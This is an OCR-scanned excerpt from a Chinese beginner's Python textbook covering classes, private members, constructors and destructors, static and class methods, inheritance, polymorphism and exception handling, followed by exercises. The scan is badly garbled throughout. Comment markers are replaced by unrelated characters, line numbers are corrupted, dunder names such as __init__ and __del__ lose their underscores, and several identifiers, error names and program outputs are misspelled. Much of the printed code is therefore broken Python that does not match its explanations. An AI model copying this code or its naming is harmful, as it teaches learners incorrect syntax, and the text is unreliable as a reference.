最 佳 的 处 理 方法 ,这 种 机 制 称 为 多 态 。 类 的 封装 、 继 承 、 多 态 是 面向 对 象 编程 中 三 个 重要 
的 概念 。 


5.1 类 的 定义 


类 是 面向 对 象 编程 中 非常 重要 而 又 基础 的 概念 ,在 使 用 类 之 前 ,需要 先 定义 类 ,定义 类 
的 语法 如 下 所 示 : 
class ClassName(SuperClassName) : 
类 成 员 变量 
def function( self): 
函数 体 
一 般 情况 下 ,类 名 的 首 字母 需要 大 写 ,SuperClassName 是 父 类 名 ,车 没 有 父 类 , 则 父 类 名 为 
空 ,或 者 为 object。 定 义 类 方法 时 ,至 少 需要 一 个 参数 self,self 代表 将 来 要 创建 的 对 象 本 身 。 
创建 类 后 ,需要 对 类 进行 实例 化 ,生成 类 的 对 象 ,通过 对 象 才 可 以 访问 对 象 的 属性 和 方 
法 。 下 面 创建 一 个 People 类 ,并 把 它 实例 化 ,生成 对 象 zhangsan, 代 码 如 下 : 
例 [chs_1.py】 


1. #coding:utf—8 
2. class People(object): 
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3 

4 def eat( self): 

上 print("I am eating.") 
6. def sleep(self) : 

7 print("I am sleeping.") 
8 

9 


zhangsan = People() 井 生成 People 类 的 实例 zhangsan 对 象 
10. zhangsan. name = " 张 三 " 并 设置 zhangsan 的 name 属性 
11. print(zhangsan. name) 井 访问 zhangsan 的 name 属性 
12. zhangsan. eat() 调用 zhangsan 的 eat() 方 法 


通过 代码 定义 了 People 类 ,类 包括 name 属性 ,eat() .sleep() 方 法 ,通过 “对 象 名 . 属性 ” 
来 访问 或 设置 对 象 属性 ,通过 “对 象 名 .方法 ”来 调用 对 象 方法 。 

程序 运行 结果 : 

张 三 

I am eating. 


5.2 类 的 私有 变量 与 私有 方法 


刚才 定义 的 类 变量 和 方法 都 可 以 在 实例 对 象 中 访问 , 称 为 公有 变量 和 公有 方法 ,在 实际 
的 编程 中 ,需要 一 些 在 类 外 不 能 访问 的 变量 和 方法 ,例如 ,，_passwd 变量 、_lookpasswd() 
方法 ,这 就 是 私有 变量 和 私有 方法 ,定义 私有 变量 和 私有 方法 ,是 在 变量 或 方法 的 前 面 加 两 
个 下 画 线 。 私 有 变量 和 私有 方法 不 能 在 类 外 访问 ,只 能 在 类 中 通过 “self. 变量 ”或 “self. 方 
法 ”调用 。 

例 [chs_2.py】 


#coding:utf—8 

2. class People(object): 

3 name="" 

4. _passwd = '123456' # 定 义 了 私有 变量 _passwd 
$l def eat( self): 

6 print("I am eating.") 

多 def sleep(self) : 

8. print("I am sleeping.") 

9. def _lookpasswd(self): 井 定义 了 私有 方法 _1lookpasswd() 
10. return self. _passwd 

和 def printpasswd( self): 

2 print(self._ lookpasswd()) # 在 公有 方法 中 调用 私有 方法 
13; 


14. lisi = People() 
15.1isi.name = ' 李 四 ' 

16. #print(lisi. passwd) 
17. #print(_ lookpasswd()) 
18. lisi.printpasswd() 


每 个 人 都 有 自己 的 小 秘密 ,如 网 银 的 密码 等 ,为 了 资金 的 安全 ,不 能 把 它 告 诉 任何 人 。 
这 里 ,在 People 类 中 定义 了 _passwd 变量 和 _ lookpasswd() 方 法 .它们 是 私有 变量 和 私有 
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方法 , 当 执行 print(lishi. _passwd) 时 ,会 产生 错误 ,返回 的 错误 信息 是 : 
RttributeError: 'People' object has no attribute '_passwd' 


说 明 在 类 外 不 能 访问 _passwd 变量 。 
当 执 行 print(_ lookpasswd()) 时 ,也 会 产生 错误 ,返回 的 错误 信息 是 


NameError: name ' lookpasswd' is not defined 


也 就 是 说 ,私有 方法 也 不 能 在 类 外 访问 。 为 了 访问 私有 变量 和 私有 方法 ,需要 在 类 中 定 

一 个 公有 方法 ,在 公有 方法 中 访问 私有 变量 和 私有 方法 。 在 类 外 通过 公有 方法 才能 访问 
ee 在 本 例 中 是 通过 printpasswd() 方 法 调用 私有 方法 _ lookpasswd()， 
从 而 实现 了 查看 密 钥 的 功能 。 


5.3 构造 函数 与 析 构 函数 


在 类 中 有 两 个 特殊 的 函数 : 构造 函数 和 析 构 函数 。 构 造 函 数 的 名 称 为 _init_() , 析 构 
函数 的 名 称 为 _del_0 〇 ,构造 函数 是 在 类 实例 化 时 被 调用 , 析 构 函数 是 在 类 实例 化 被 删除 
时 被 调用 。 正 是 基于 这 样 的 原理 ,把 对 类 进行 初始 化 的 功能 放 在 构造 函数 内 ,把 释放 类 所 占 
用 资源 的 功能 放 在 析 构 函数 内 。 下 面 用 构造 函数 对 People 类 进行 初始 化 。 

例 [chs_3initPeople. py】 


1. #coding:utf—8 

2. class People(object): 

3 name="" # 类 变量 

4 def _init (self,name= ' 无 名 氏 ', sex= ' 男 '): 

Si self. sex= ' 男 ' # 实 例 变 量 
6 self. name = name 井 实例 变量 
7 print("{} 诞生 了 ". format(name) ) 

8 def printInfo(self) : 


9. print(self. name, self. sex) 
10. zhangsan = People(" 张 三 ") 

11. zhangsan. printInfo() 

12. lisi = People() 

13. lisi.printInfo() 


程序 运行 结果 : 
张 三 诞 生 了 
张 三 盟 


无 名 氏 诞 生 了 
无 名 氏 男 


在 People 类 的 初始 化 方法 _init_(self) 中 ,定义 了 sex 变量 ,把 在 初始 化 方法 中 定义 的 
变量 称 为 实例 变量 ,实例 变量 通过 ”self. 变量 名 ”的 方法 来 访问 ; name 变量 是 在 类 函数 之 外 
定义 的 ,把 这 样 的 函数 称 为 类 变量 ,类 变量 通过 “类 名 . 变量 名 ”的 方法 来 访问 ,不 建议 通过 
“类 名 . 变量 名 ”的 方法 来 访问 类 变量 。 
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在 类 变量 定义 完 之 后 ,在 程序 中 可 以 通过 “类 名 . 变量 名 ”的 方法 给 类 增加 变量 ,如 
People. qq, 给 People 类 添加 了 一 个 qq 变量 。 代 码 如 下 : 
例 [chs_3classvar. py】 


1. 井 coding:utf 一 8 

2. class People(object) : 
1 name="" 

4 def _init (self,name= ' 无 名 氏 ', sex= ' 男 '): 
5 self. sex = sex 

6 self. name = name 

志 print("{} 诞生 了 。".format(name)) 

8 def printInfo( self) : 

9. print(self.name，self. sex) 

10. zhangsan = People() 

11，zhangsan. name = ' 张 三 ' 

12. zhangsan. printInfo() 

13. People.qq = '123456' 

14. print("qgq:",zhangsan. qq) 


qq: 123456 


析 构 函数 用 于 释放 对 象 所 占用 的 资源 , 它 会 在 收回 对 象 空间 之 前 自动 被 调用 。 例 如 ,使 
用 Python 的 del 命令 删除 对 象 时 ,就 会 自动 调用 对 象 的 析 构 函数 。 
例 [chs_3init_del. py】 


1. #coding:utf—8 
2. class People(object): 

3 name="" 

4 def _init (self,name= ' 无 名 氏 ', sex= ' 男 '): 

5. Self. sex = Sex 

6 self. name = name 

7 print("{} 诞生 了 ". format(name) ) 

8 def printInfo(self) : 

9. print(self. name, self. sex) 

10. def _del_ (self): 

11. print("Bye Bye! {} 的 生命 终点 到 了 ". format(self. name)) 
12. 1lisi = People( ' 李 四 ', ' 女 ') 

13. lisi.printInfo() 

14. del lisi 


程序 运行 结果 : 
李 四 诞 生 了 


李 四 女 
Bye Bye! 李 四 的 生命 终点 到 了 
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程序 有 _init _() 函 数 和 _ del _() 函 数 两 个 函数 , 主 程序 中 执行 lisi= People(' 李 四 '， 
' 女 ') 语 句 时 , 即 生成 了 People 类 的 对 象 lisi, 此 时 ,调用 了 _init_0O 〇 函数 ,对 lisi 进行 了 初始 化 。 
del lisi 删除 对 象 lisi 时 ,自动 调用 了 析 构 函数 ,输出 了 “Bye Bye! 李 四 的 生命 终点 到 了 ”。 


5.4 静态 变量 与 静态 方法 


5.4.1 静态 变量 


在 类 中 可 以 定义 静态 变量 ,静态 变量 与 普通 的 类 变量 不 同 ,静态 变量 只 属于 定义 它们 的 
类 。 在 Python 中 不 需要 显 式 地 定义 静态 变量 ,任何 公有 变量 都 可 以 作为 静态 变量 ,访问 静 
态 变量 采用 下 面 的 方法 : 


类 名 .静态 变量 


静态 变量 虽然 可 以 通过 类 名 访问 或 对 象 名 访问 ,但 两 种 访问 方式 是 截然 不 同 的 ,而 且 互 
不 干扰 。 

下 面 定 义 一 个 网 站 的 访问 者 类 Visitor, 在 类 中 定义 静态 变量 visitors_count, 用 于 记录 
访问 者 的 数量 ,静态 变量 online_count 用 于 记录 在 线 访客 的 数量 。 要 求 当 有 新 的 访问 者 来 
访 时 ,visitors_count 和 online_count 均 加 1; 访问 者 退出 后 ,online_count 减 1, 而 visitors_ 
count 不 变 , 保 持 以 前 的 值 。 

例 [chs_4_1.py】 


| #coding:utf—8 

2. class Visitor(object): 

3 visitors count=0 

4. online count =0 

:上 def init (self): 

6 Visitor. visitors count +=1 

7 Visitor. online count +=1 

8 def del (self): 

9 Visitor. online count -=1 

10. print(Visitor.visitors count, Visitor.online count) 

11. visitorl = Visitor() 

12. print(Visitor.visitors count, Visitor.online count) 

13. visitor2= Visitor() 

14. print(Visitor.visitors count, Visitor.online count) 

15. visitor3= Visitor() 

16. print(Visitor.visitors count, Visitor.online count) 

17. del visitorl 井 删 除 visitorl 
18. print(Visitor.visitors count, Visitor. online count) 

19. del visitor2 井 删除 visitor2 
20. print(Visitor.visitors count, Visitor.online count) 

21. del visitor3 # 删除 visitor3 


22. print(Visitor.visitors count, Visitor. online count) 
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首先 创建 一 个 Visitor 类 ,在 类 的 构造 函数 _init_() 中 对 Visitor. visitors _count、 
Visitor. online_count 变量 均 加 1, 尽 管 后 来 删除 了 实例 visitorl .visitor2 ,visitor3 ,静态 变量 
visitors_count 的 值 仍然 保持 原 有 值 ,Visitor. online_count 的 值 减 1 。 


5.4.2 静态 方法 和 类 方法 


Python 类 中 除了 以 上 介绍 的 对 象 方法 (也 称 为 实例 方法 ) 以 外 ,还 有 两 种 方法 : 静态 方 
法 和 类 方法 。 对 象 方法 没有 修饰 符 , 但 必须 有 一 个 参数 self,self 代表 对 象 本 身 , 通 过 “self. 
对 象 变量 ?或 “self. 对 象 方法 ?访问 对 象 变量 和 对 象 方法 。 静 态 方法 采用 @ staticmethod 修 
饰 , 静 态 方法 与 静态 变量 一 样 ,不 属于 任何 一 个 具体 的 对 象 ,静态 方法 的 使 用 类 似 函 数 工具 
库 , 直 接 采 用 “类 名 . 静态 方法 ?来 调用 ,但 静态 方法 不 能 访问 对 象 变量 。 类 方法 采用 
@classmethod 修饰 ,类 方法 必须 有 一 个 参数 cls,cls 代表 该 类 ,类 方法 也 不 访问 对 象 变量 ， 
但 可 以 访问 类 变量 。 下 例 通 过 People 类 中 定义 的 三 种 方法 来 说 明 它 们 的 异同 。 

例 [chs 4 2.py】 


1. 井 coding:utf -8 

2. class People(object) : 

3 name = 'noname' # 类 属性 ,是 静态 对 象 ,注意 这 里 值 为 noname 

4 def _init (self,name= "无 名 氏 "): 

3 self. name = name 

6 

7 def sayHello( self): 并 这 里 的 参数 为 self, 可 以 访问 对 象 变量 

8. print("Hi, 我 是 {}". format( self. name)) 

9, 

10. @classmethod 

网 def work(cls) : # 参 数 为 cls, 只 可 以 访问 类 变量 ,不 可 以 访问 对 象 变量 
12; 井 类 方法 可 以 被 类 调用 ,也 可 以 被 实例 调用 ; 

13. print(" 劳 动 是 人 类 的 特有 属性 ,{} 正在 工作 ……". format(cls. name)) 
14. 

5; @staticmethod 

16. def eat() : 

Ly 内 井 print("{f} 正 在 吃 东西 …… ". format(self.name) ) 

18. # 静态 方法 参数 没有 实例 参数 self, 也 就 不 能 调用 实例 参数 

19. print("{} 正 在 吃 东 西 …… ". format(People. name)) 

20. 


21. if name == " main _": 
2 p = People(" 张 三 ") # 对 类 People 类 实例 化 ,注意 这 里 name 为 " 张 三 " 
3 p. sayHello( ) 井 对 象 可 以 调用 对 象 方法 


24. Pp: work() 划 对 象 可 以 调用 类 方法 , 即 可 通过 "对 象 . 类 方法 "调用 类 方法 
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25: p.eat() 并 对 象 可 以 调用 静态 方法 , 即 可 通过 "对 象 . 静态 方法 "调用 静态 方法 
26. 并 People. sayHello( ) # People 类 未 实例 化 ,不 能 直接 调用 对 象 方法 

2 People. work() # 可 以 调用 类 方法 ,但 不 能 访问 实例 变量 

28. People.eat() 井 可 以 调用 静态 方法 ,但 不 能 访问 实例 变量 

程序 运行 结果 : 

Hi, 我 是 张 三 

劳动 是 人 类 的 特有 属性 ,noname 正在 工作 …… 

noname 正在 吃 东西 …… 

劳动 是 人 类 的 特有 属性 ,noname 正在 工作 …… 

noname 正在 吃 东 西 … 


(村 说 明 : 第 3 行 ,定义 了 类 变量 ,注意 ,初始 值 为 noname。 

第 4 一 5 行 , 定 义 了 构造 函数 ,给 对 象 变量 赋值 ,默认 值 为 “无 名 氏 ”。 

第 7 一 8 行 ,定义 了 类 方法 sayHello() ,方法 有 一 个 参数 self,self 代表 对 象 本 身 。 因 此 ， 
该 方法 为 对 象 方法 ,可 以 访问 对 象 变量 。 

第 10 一 13 行 , 定 义 了 类 方法 ,该 方法 的 参数 为 cls,cls 代表 类 本 身 , 通 过 “cls. 类 变量 ”可 
以 访问 类 变量 。 

第 15 一 19 行 ,定义 了 静态 方法 ,该 方法 没有 参数 。 因 该 方法 没有 self, 所 以 不 能 用 
“self. 对 象 变量 ”的 方法 访问 对 象 变量 。 第 17 行 在 运行 时 会 出 错 , 因 此 被 注释 掉 。 

第 22 行 ,对 People 类 实例 化 ,对 象 名 为 p。 

第 23 行 ,通过 对 象 名 调用 对 象 方法 (p. sayHello())。 

第 24 行 ,通过 对 象 名 调用 类 方法 (p. work())。 

第 25 行 ,通过 对 象 名 调用 静态 方法 (p. eat())。 

第 26 行 ,通过 类 名 调用 对 象 方法 出 错 ,所 以 加 注释 。 

第 27 行 ,通过 类 名 调用 类 方法 。 

第 28 行 ,通过 类 名 调用 静态 方法 。 

通过 对 上 例 的 分 析 , 可 以 看 出 类 方法 .静态 方法 和 对 象 方法 的 区 别 主 要 体现 在 以 下 三 个 
方面 。 

(1) 调用 时 机 不 同 : 对 象 方法 必须 在 类 实例 化 后 , 才 可 以 用 ; 类 方法 和 静态 方法 不 用 实 
例 化 ,直接 用 “类 名 . 静态 方法 "调用 静态 方法 ,或 者 用 “类 名 . 类 方法 ?调用 类 方法 。 静 态 方法 
的 使 用 就 像 函 数 工 具 库 一 样 直接 调用 ,多 个 对 象 可 以 共用 该 静态 方法 。 而 实例 方法 只 有 在 
类 实例 化 后 ,通过 “对 象 名 . 对 象 方法 ”调用 。 

(2) 可 访问 的 对 象 不 同 : 静态 方法 和 类 方法 在 访问 本 类 的 成 员 时 ,只 人 允许 访问 静态 成 员 
( 即 静 态 成 员 变 量 和 静态 方法 ) ,而 不 允许 访问 实例 变量 和 实例 方法 ; 对 象 方法 则 无 此 限制 。 

(3) 参数 不 同 : 静态 方法 没有 参数 ,类 方法 的 参数 为 cls, 对 象 方法 的 参数 为 self。 


5.5 类 的 继承 


类 的 继承 是 面向 对 象 编程 中 重要 的 机 制 , 通 过 类 的 继承 实现 了 代码 的 复 用 。 做 项 目 时 ， 
以 前 设计 过 的 具有 一 定 功能 的 类 ,对 系统 进行 更 新 改造 时 ,设计 了 新 的 类 ,新 的 类 继承 自 原 


90 Python 编程 入 门 与 案例 详解 


有 的 类 ,那么 这 个 新 生成 的 类 称 为 子 类 ,被 继承 的 类 称 为 父 类 。 子 类 继承 了 父 类 的 变量 和 方 
法 ,同时 子 类 还 可 以 具有 父 类 没有 的 属性 和 方法 。 类 的 继承 是 这 样 的 : 


class Subclass(ParentClass) : 
classstate 


例 [ch5_5. py】 


1. #coding:utf—8 

2. class People(object): 

3 name="" 

4 _password = '123456' 

3 def eat( self): 

6 print("I am eating.") 

7 def sleep(self) : 

8 print("I am sleeping.") 

9 def lookpassword(self): 

10. return self. password 

bP def printpassword( self): 

EP print(self. lookpassword( )) 

FE 

14. class Student(People) : 井 定 义 Student 类 ,该 类 继承 自 People 类 
15., idnum="" # 定 义学 号 (idnum) 变量 
16. def study(self): 井 定 义 study() 方 法 

5 print('I am studying. ') 

8， 


19. lisi= Student() 

20. lisi.name = u" 李 四 " 

21. lisi. idnum = '145322101 

22. lisi. study() 

23. lisi. sleep() 

24. lisi.printpassword() 

通过 上 例 可 以 看 出 : 子 类 Student 继承 了 父 类 People 的 所 有 变量 和 方法 ,尽管 Student 
类 没有 定义 eat() .sleep() 方 法 ,但 它 从 父 类 People 继承 而 具有 了 这 些 方法 ,同时 Student 
类 又 定义 了 自己 的 新 方法 study() 方 法 和 idnum 变量 。 


5.6 多 态 


多 态 是 指 父 类 中 定义 的 一 个 方法 ,可 以 在 其 子 类 重新 实现 ,不 同 子 类 中 的 实现 方法 也 不 
同 。 当 调用 某 一 方法 时 ,可 以 根据 对 象 的 不 同 ,决定 调用 不 同 对 象 的 不 同方 法 。 

下 面 定 义 两 个 类 : Student 类 和 Teacher 类 ,它们 都 是 People 类 的 子 类 ,Student 类 实 
现 了 自己 的 study() 方 法 ,Teacher 类 实现 了 teach() 方 法 ,并 且 它 们 都 覆 写 (Override) 了 
People 类 的 sleep() 方 法 。 为 了 展示 类 方法 的 多 态 特 性 ,这 里 又 定义 了 p_sleep(People)， 
People 作为 传递 参数 。 

例 [chs_6poly. py】 


1. #coding:utf—8 


2. class People(object) : 

3 name="" 

4 _ password = '123456" 

5 def eat(self) : 

6 print("I am eating.") 

7 def sleep(self) : 

8 print("I am sleeping.") 

9 def lookpassword(self): 

10. return self. password 

六 入 def printpassword( self): 

Pb print(self. lookpassword()) 

13. class Student(People): 井 定义 Student 类 ,该 类 继承 自 People 类 
14. idnum="" 井 定义 学 号 (idnum) 属 性 
15: def study(self): 井 定义 study() 方 法 

16. print( ' 我 在 课堂 上 学 习 . ') 

17. def sleep(self) : # 重 新 实现 了 sleep() 方 法 
18. print(" 我 每 天 需要 睡 8 小时") 

19. class Teacher(People): # Teacher 类 继承 了 People 类 
20. teacherid= 

要 def teach( self): 

print("I am teaching") 

23; def sleep(self): # 重 新 实现 了 sleep() 方 法 
24. print( ' 我 每 天 只 睡 6 小 时 ') 

25. 

26. def p_sleep(People): 

2 People. sleep() 

28, 


29. wangwu = Teacher() 
30. wangwu. sleep() 


32. maliu = Student() 
33. maliu. sleep() 


35. p_sleep(maliu) 
36. p_sleep(wangwu) 


程序 运行 结果 : 


我 每 天 只 睡 6 小 时 
我 每 天 需要 睡 8 小 时 
我 每 天 需要 睡 8 小 时 
我 每 天 只 睡 6 小 时 
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(各 说 明 : 第 26 一 27 行 ,定义 了 p_sleep(People) 方 法 ,People 作为 参数 代表 People 类 


的 对 象 。 
第 29 行 ,创建 Teacher 类 的 对 象 wangwu。 


第 30 行 , 调 用 Teacher 类 的 sleep() 方 法 ,运行 结果 为 “我 每 天 只 睡 6 小 时 ”。 


第 32 行 ,创建 Student 类 的 对 象 maliu。 
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第 33 行 , 调 用 Student 类 的 sleep() 方 法 ,运行 结果 为 “我 每 天 需要 睡 8 小时”, 这 说 明子 
类 可 以 履 写 父 类 中 的 方法 。 
第 35 行 ,把 学 生 对 象 maliu 传 给 p_sleep() ,显示 的 结果 为 “我 每 天 需要 睡 8 小 时 ”。 
第 36 行 ,把 教师 对 象 wangwu 传 给 p_sleep(), 显 示 的 结果 是 “我 每 天 只 睡 6 小时”, 这 
说 明 p_sleep() 方 法 根据 对 象 的 不 同 选择 了 不 同 的 方法 进行 处 理 。 这 只 是 多 态 的 简单 例子 ， 
更 详细 的 知识 请 参考 相关 资料 。 


5.7 多 重 继 承 


Python 中 一 个 类 不 仅 可 以 从 一 个 父 类 继承 ,还 可 以 从 多 个 父 类 继承 ,实现 类 的 多 重 继 
承 。 代 码 如 下 : 
例 [chs_7multi. py】 


#coding:utf—8 

2. class People(object): 

3 name=" 

4 _password = '123456"' 

5 def eat( self): 

6 print("I am eating.") 

和 def sleep(self) : 

8 print("I am sleeping.") 

9 def _lookpassword(self): 

10. return self.__password 

Ls def printpassword!( self): 

Lv print(self.__ lookpassword( )) 

13. class Student(People): # 定 义 Student 类 ,该 类 继承 自 People 类 
i idnum=" # 定 义学 号 (idnum) 属 性 
15, def study(self): 井 定义 study() 方 法 
16. print( ' 我 在 课堂 上 学 习 ') 

a def sleep(self) : 

18. print(" 我 每 天 睡 8 小 时 ") 

19. class Teacher(People) : 

20. teacherid = "" 

2 def teach(self) : 

2 print("I am teaching") 

FE 工交 def sleep(self) : 

24. print( ' 我 每 天 只 睡 6 小 时 ') 

25. class Doctor( Teacher, Student) :” 井 Doctor 类 继承 自 Teacher 和 Student 
26. def reseach( self) : 

2 print("I am research on my field. ") 

28, def study(self) : 

29. print( ' 我 在 实验 室 研究 学 习 ') 

30. def teach(self) : 

31. print(" 我 在 做 教授 的 助教 ") 

32, 


33. wangwu = Doctor() 
34. wangwu. teach() 
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35. wangwu. sleep() 
36. wangwu. study 


程序 运行 结果 : 


我 在 做 教授 的 助教 
我 每 天 只 睡 6 小 时 


首先 ,定义 了 一 个 People 类 ; 其 次 ,定义 了 它 的 子 类 Student、Teacher 类 ,在 Student 类 
中 定义 了 新 的 方法 study() ,并 且 重 新 实现 了 sleep() 方 法 ; 在 Teacher 类 中 定义 了 teach() 
方法 ,并 且 重 新 实现 了 sleep() 方 法 ; 最 后 ,定义 了 Doctor 类 ,作为 博士 ,他 具有 双重 身份 ,一 
方面 是 学 生 , 要 学 习 , 另 一 方面 又 是 教授 的 助教 ,要 给 本 科 生 授课 ,他 继承 了 Student 类 和 
Teacher 类 ,具有 了 两 个 父 类 的 特征 。 


习 题 
一 、 选 择 题 
1. 构造 函数 是 类 的 一 个 特殊 函数 ,在 Python 中 ,构造 函数 的 名 称 是 ( Na 
A. _construct B. 与 类 同名 Cnit D. init 
2. 类 的 析 构 函数 主要 用 于 释放 对 象 所 占用 的 资源 , 它 的 名 称 是 ( Ns 
A. destructor B. _del_ C. del D. _ 类 名 _ 


3， Python 类 中 有 一 个 特殊 的 变量 ( ) , 它 表示 当前 对 象 本 身 ,可 以 使 用 它 来 引用 对 
象 中 的 成 员 变 量 和 成 员 方 法 。 


A. me B. this C. self D. 类 名 
4. Python 类 中 ,表示 私有 变量 的 是 ( nn 

A. private B. _XXX_ _ CX D. public 
5. Python 类 中 ,可 以 使 用 ( ) 修 饰 符 定义 静态 方法 。 

A. @staticmethod  B. @static C. static D. @local 
二 、 编程 题 


1. 设计 1 个 类 代表 汽车 ,该 类 有 run() 方 法 ,设计 小 汽车 类 继承 于 汽车 ,该 子 类 有 stop() 
方法 。 

2. 设计 1 个 类 代表 三 角形 , 它 有 3 条 边 长 属性 ,输出 三 角形 面积 方法 (提示 : p 二 (a 十 
b 二 0)/2,S 二 VL[p(p 一 a)(p 一 0)(p 一 c)] ) ,建立 两 个 三 角形 的 对 象 并 使 用 它 。 








在 日 常 编程 的 过 程 中 ,经 常会 遇 到 类 似 以 下 情况 : 


>>a=3 
>>b=0 


>>c = a/b # 除数 为 零 错误 


Traceback (most recent call last): 
File "<pyshell#2>", line 1, in<module> 
c= a/b 
ZeroDivisionError: division by zero 
wr lista = 112)374;5,6] 
>>> lista[6] # 序 列 索 引 超 界 错 误 
Traceback (most recent call last): 
File "<pyshell#4>", line 1, in<module> 
lista[6] 
IndexError: list index out of range 


>>> listA[2] 井 Python 大 小 写 敏感 


Traceback (most recent call last): 
File "<pyshell#5>", line 1, in<module> 
listA[2] 
NameError: name 'listA' is not defined 


产生 这 些 错 误 的 原因 有 较为 简单 的 语法 错误 和 逻辑 错误 (如 大 小 写 错误 . 缩 进 错误 等 ), 
也 有 运行 错误 (如 除数 为 0 序列 索引 超 界 等 错误 ) 。 当 Python 检测 到 一 个 错误 时 ,解释 器 
就 会 指出 当前 程序 无 法 继续 运行 下 去 ,这 时 就 会 抛 出 异常 。 程 序 需要 捕获 并 处 理 这 个 异常 ， 

那 什么 是 异常 呢 ? 先 来 看 错误 ,错误 大 致 可 以 分 为 以 下 三 类 。 

(1) 语法 错误 。 由 于 初学 者 对 Python 语法 掌握 得 不 是 很 好 ,编写 的 程序 经 常会 出 现 各 
种 语法 错误 。 如 大 小 写 错误 、 缩 进 错误 ,标点 符号 错误 等 。 
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(2) 逻辑 错误 。 程 序 运行 后 ,不 能 得 到 预期 的 结果 。 例 如 ,指令 次 序 错误 ,算法 考虑 不 
周 等。 
(3) 运行 错误 。 程 序 在 运行 过 程 中 出 现 的 错误 ,这 类 错误 事先 是 不 可 预料 的 。 例 如 , 除 
数 为 0, 序列 下 标 超 界 , 无 法 打开 文件 ,网 络 中 断 ,磁盘 空间 不 足 等 。 
第 (1) (2) 类 错误 不 属于 异常 ,运行 错误 才 属于 异常 。 必 须 对 异常 进行 捕获 并 处 理 , 否 
则 会 影响 程序 的 健壮 性 。 


6.1 捕获 并 处 理 异 常 


Python 中 使 用 try...except..…. 语 句 对 代码 块 进行 监测 ,检查 是 否 有 异常 发 生 。 异 常 捕 
获 语句 有 两 种 形式 : try...except... 和 try...except...else...。 


6.1.1 try...except... 语 句 


Python 中 最 常见 的 异常 捕获 方式 如 下 所 示 


try: 
代码 块 
except Exception [as reason] : 
except 块 井 异 常 处 理 模块 
代码 块 是 被 监控 ,有 可 能 会 出 现 异常 的 语句 ; Exception 是 捕获 的 异常 的 类 型 ,常见 的 
异常 类 型 如 表 6-1 所 示 。 


表 6-1 Python 中 常见 的 异常 类 型 



































异常 类 名 描 述 
Exception 所 有 异常 的 基 类 
AttributeError 特性 应 用 或 赋值 失败 时 引发 
IOError 输入 /输出 错误 时 引发 
IndexError 序列 索引 越界 时 引发 
KeyError 在 使 用 字典 不 存在 的 键 时 引发 
NameError 尝试 访问 一 个 未 申明 的 变量 时 引发 
SyntaxError 由 语法 错误 时 引发 
TypeError 对 象 类 型 错误 时 引发 
ValueError 传 给 函数 的 参数 类 型 不 正确 时 引发 
ZeroDivisionError 除数 为 0 时 引发 
下 面 来 看 一 段 代 码 : 
>>> lista = [1,2,3,4,5,6] 
>>> try: 
seiniliieralel 
except IndexError: 
Print(" 序 列 下 标 越界 了 ") 


序列 下 标 越界 了 
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这 里 定义 了 有 6 个 元 素 的 列表 lista, 然 后 访问 列表 的 第 6 个 元 素 ,代码 中 使 用 6 作为 下 
标 , 显 然 超 过 了 列表 下 标的 界线 ,运行 brint(listaL6]) 引 发 IndexError 异常 ,该 异常 被 try... 
except.… 语 句 捕获 ,处 理 异 常 的 语句 输出 了 相应 的 提示 信息 。 
当然 ,try...except... 语 句 也 可 以 捕获 异常 发 生 的 原因 ,代码 如 下 : 
>>> try: 
print(lista[6]) 
except IndexError as e: 


print(" 序 列 下 标 越 界 了 ") 
print(e) 


程序 运行 结果 : 


序列 下 标 越界 了 
list index out of range 


代码 except IndexError ase 将 捕获 IndexError 异常 及 异常 产生 的 原因 e,print(e) 则 输 
出 异常 产生 的 原因 。 


6.1.2 try...except...else... 语 句 


else 语句 经 常 与 其 他 语句 一 起 使 用 ,表示 另外 情况 ,try...except...else... 语 句 的 功能 是 
如 果 try 语句 捕获 了 异常 ,就 执行 except 语句 块 处 理 异常 ; 如 果 try 语句 没有 捕获 异常 , 则 
执行 else 语句 块 。 

例如 ,循环 输入 一 个 数字 作为 列表 的 下 标 ,然后 输出 该 列表 元 素 , 若 下 标 越界 , 则 引发 异 
常 ; 若 下 标 未 越界 , 则 退出 循环 。 

例 [ch6_1_2try_else.py】 


和 井 coding:utf 一 8 

2 lista = [1,2,3,4,5,6] 
3. while True: 

4. a = input(" 请 输入 列表 的 下 标 :") 
和 inta = int(a) 
6 tey: 

i print(lista[ inta]) 
8. except IndexError: 

9. print(" 下 标 越界 了 ") 
10. else: 

11, break 

12. print ("程序 结 束 了 ") 


程序 运行 结果 : 


请 输入 列表 的 下 标 : 8 
下 标 越界 了 
请 输入 列表 的 下 标 : 6 
下 标 越界 了 
请 输入 列表 的 下 标 : 4 





说明: 第 4 行 ,给 入 一 个 吾 数 作为 列表 的 下 标 。 

第 5 行 ,将 输入 的 字符 串 转换 成 整数 。 

第 7 行 ,输出 列表 的 元 素 。 

第 一 次 输入 8, 引 发 了 异常 ,继续 循环 ; 第 二 次 输入 6, 又 一 次 引发 异常 ; 第 三 次 输入 4， 
则 输出 listaL4] ,执行 else 语句 后 的 break 语句 退出 循环 。 


6.2 捕获 多 个 异常 


程序 执行 过 程 中 ,可 能 引发 不 同类 型 的 异常 ,如 果 要 捕获 不 同类 型 的 异常 ,可 以 使 用 多 
个 except 捕获 并 处 理 多 个 异常 。 
例 [ch6_2try_excepts.py】 


1 #coding:utf—8 

2. lista=[0,1,2,3,4,5,6] 

3. while True: 

4 nstr = input(" 请 输入 列表 的 下 标 : ") 
性 try: 

6 nint = int(nstr) 

7 print(30/lista[nint]) 

8 except IndexError as e: 

9. print(" 列 表 下 标 越 界 了 ") 

10. print(e) 

bE except ZeroDivisionError as e: 

12. print(" 除 数 为 0 了") 

13, print(e) 

14. except ValueError as e: 

15. print(" 数 据 类 型 错误 ") 

16. print(e) 

17. else: 

18. print("30/% d= %d"g% (lista[nint]，30/1ista[nint])) 
19; break 


请 输入 列表 的 下 标 : 0 
除数 为 0 了 

division by zero 

请 输入 列表 的 下 标 : 7 
列表 下 标 越界 了 

list index out of range 
请 输入 列表 的 下 标 : a 
数据 类 型 错误 

invalid literal for int() with base 10: 'a' 
请 输入 列表 的 下 标 : 3 
10.0 

30/3 = 10 
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人 二 说 明 : 第 4 行 ,input 〇 输入 一 个 字符 囊 。 

第 6 行 ,将 输入 的 字符 串 转变 为 整数 。 进 行 类 型 转换 时 ,可 能 会 引发 ValueError( 数 值 
错误 ) 异 常 。 

第 7 行 ,listaLnint] 获 取 下 标 为 nint 的 列表 元 素 , 然 后 输出 30/listaLnint]。 执 行 lista 
[Lnint] 时 , 可 能 会 引发 IndexError (下 标 越 界 ) 异 常 ; 执行 除法 时 ,可 能 会 引发 
ZeroDivisionError( 除 数 为 0) 异常 。 

